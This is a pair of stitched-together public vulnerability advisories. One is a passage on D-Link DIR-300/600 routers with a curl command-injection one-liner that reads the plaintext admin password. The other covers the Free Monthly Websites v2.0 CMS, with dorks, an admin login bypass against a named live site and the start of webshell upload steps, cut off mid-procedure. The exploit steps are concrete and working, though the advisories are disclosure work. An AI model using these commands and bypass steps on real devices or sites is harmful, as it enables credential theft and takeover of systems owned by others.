1/tcp  filtered tcpmux
23/tcp open     telnet  BusyBox telnetd 1.14.1 <==!!!
snip

Screenshot: 
http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DIR-600-OS-Command-Injection-telnetd.png

* Information disclosure: 

Nice server banner to detect this type of devices easily:
Server: Linux, HTTP/1.1, DIR-300 Ver 2.12
Server: Linux, HTTP/1.1, DIR-600 Ver 2.12

* For changing the current password there is no request to the current 
password 

With this vulnerability an attacker is able to change the current password 
without knowing it. The attacker needs access to an authenticated browser.

* Insecure Cryptographic Storage: 

There is no password hashing implemented and so it is saved in plain text on 
the system:
# cat var/passwd
admin test 0

Positive Technologies has released an advisory in 2011 and D-Link has fixed 
this issue:
http://en.securitylab.ru/lab/PT-2011-30
With the current version of the firmware the passwords are stored again in 
plaintext.

If you combine the plaintext credential vulnerability with the unauthenticated 
os command injection vulnerability you will get the following one liner to 
extract the admin password from every vulnerable device:

root@bt:~# curl --data "cmd=cat /var/passwd" http://Target IP/command.php
admin THESECRETPASS 0
root@bt:~#

* Information Disclosure: 

Detailed device information including Model Name, Hardware Version, Linux 
Kernel, Firmware version, Language and MAC Addresses are available via the 
network.

Request:
http://Target-IP/DevInfo.txt

or try to access version.txt and have a look at the html source ;)

Response:
HTTP/1.1 200 OK
Server: Linux, HTTP/1.1, DIR-600 Ver 2.14
Date: Fri, 31 Dec 1999 18:04:13 GMT
Content-Length: 267

Firmware External Version: V2.14
Firmware Internal Version: d1mg
Model Name: DIR-600
Hardware Version: Bx
WLAN Domain: 826
Kernel: 2.6.33.2
Language: en
Graphcal Authentication: Disable
LAN MAC: snip
WAN MAC: snip
WLAN MAC: snip

These details are available without authentication.

* Local path disclosure 

Every piece of information is interesting for the attacker. With this we will 
get some more details about the operating system and its paths.

Request:
http://IP/router_info.xml

Response:

0day full - Free Monthly Websites v2.0 - Multiple Web Vulnerabilities

2013-02-04 Thread Vulnerability Lab
Title:
==
Free Monthly Websites v2.0 - Multiple Web Vulnerabilities


Date:
=
2013-02-04


References:
===
http://www.vulnerability-lab.com/get_content.php?id=851


VL-ID:
=
851


Common Vulnerability Scoring System:

8.5


Introduction:
=
Free Monthly Websites 2.0 is here and you no longer have to worry about editing
complicated HTML code as we have taken care of that for you, and you no longer
have to worry about anything to do with website design as we have taken care of
that for you too, adding your Google AdSense Publisher code, taken care of,
ClickBank! All done for you, here's how it works. Upload Your Site To Your
Domain (this can be done for you). Login To Your Admin Control Panel.
Personalize Your Website (takes just 5 minutes).

(Copy of the Vendor Homepage: http://www.freemonthlywebsites2.com/ )


Abstract:
=
The independent Vulnerability Laboratory researcher (x-Cisadane) discovered 
multiple web vulnerabilities in the Free Monthly Websites v2.0 CMS.


Report-Timeline:

2013-02-04: Public Disclosure


Status:

Published


Exploitation-Technique:
===
Defensiv


Severity:
=
Critical


Details:

Multiple web vulnerabilities are detected in the Free Monthly Websites v2.0 
Content Management System.
The first bypass vulnerability allows attackers to bypass the web
application's auth of the admin login.
The second vulnerability allows uploading, for example, webshells and accessing
them after upload via unauthorized web access.

Vulnerable Module(s):
[+] Login Auth (Admin) - Bypass
[+] Upload File - Unauthorized File Upload & Access


Proof of Concept:
=
The vulnerabilities can be exploited by remote attackers without required user 
interaction or privileged application user account.
For demonstration or reproduce ...

Dork(s):
inurl:/index_ebay.php
Powered by: Resell Rights Fortune
Generating Traffic to Your Site with Keyword Based Articles
Powered By: Free Monthly Websites 2.0
 

[ 1 ] Admin Login Bypass

Vulnerable page http://target.com/[path]/admin/index.php
Line 
40 <form name="frm" action="file_io.php" method="post" onSubmit="return chk()">
41 <input type="hidden" name="do_type" value="admin_settings_read">

Vulnerable page http://target.com/[path]/admin/login.php
Line
40 <form name="frm" action="file_io.php" method="post" onSubmit="return chk()">
41 <input type="hidden" name="do_type" value="admin_settings_read">

Vulnerable page http://target.com/[path]/admin/file_io.php

Line
14 if($_REQUEST["do_type"]=="admin_settings_read")
15 {
16  $filename="settings/admin_settings.txt";
17
18  if(!$handle = fopen($filename, 'r'))
19  {
20  echo "Cannot open file ($filename)";
21  exit;
22  }
23  $contents = fread($handle, filesize($filename));
24  fclose($handle);
25  $argument_arr=explode("#_1_#",$contents);
26
27  if($argument_arr[0]==$_REQUEST["username"] && $argument_arr[1]==$_REQUEST["pass"])
28  {
29  $_SESSION["logged_in"]=true;
30  header("location:welcome.php");

Based on line 16 we know that the Admin Username and Password are stored in
admin_settings.txt, NOT in the Database!
So when we log into the Admin Panel, file_io.php will read the valid Username and
Password from admin_settings.txt.
If you access the file admin_settings.txt directly, the result is

403 Permission Denied
You do not have permission for this request /admin/settings/admin_settings.txt
Picture: http://i48.tinypic.com/2gvlwt4.png


So... How to Bypass Admin Login Page? 
1st. Open the Admin Login Page : http://target.com/[path]/admin/index.php 
Live Target : http://www.massmoneywebsites.com/admin/

2nd. Inspect Element on the login Form. 
Picture: http://i47.tinypic.com/2r5ddp1.png

3rd. Change from 
<form name="frm" action="file_io.php" method="post" onsubmit="return chk()"></form>
<input type="hidden" name="do_type" value="admin_settings_read">

CHANGE TO 
<form name="frm" action="file_io.php" method="post" onsubmit="return chk()"></form>
<input type="text" name="do_type" value="admin_settings_write">
Then press ENTER (please see pic).
Pic : http://i49.tinypic.com/351z3ib.png

4th. You will see a Login Failed page: "You need to login in to access that
page"
Picture: http://i50.tinypic.com/33ws8jb.png
Never mind about that, just click the 'Login Button' and VOILA, you get Admin
Access!
Picture: http://i45.tinypic.com/jzwpea.png

[ 2 ] Upload PHP Backdoor or PHP Shell 

This vulnerability works on PREMIUM VERSION of Free Monthly Websites 2.0

So... How to Upload Backdoor (PHP Shell)?

1st. Go to Add/Remove Navigation Page. 
http://target.com/[path]/admin/add_main_pages.php
Live Target : http://www.massmoneywebsites.com/admin/add_main_pages.php

2nd. Enter a Name For Your New Navigation Page That You Wish To Add: dwi.php 
And click Add New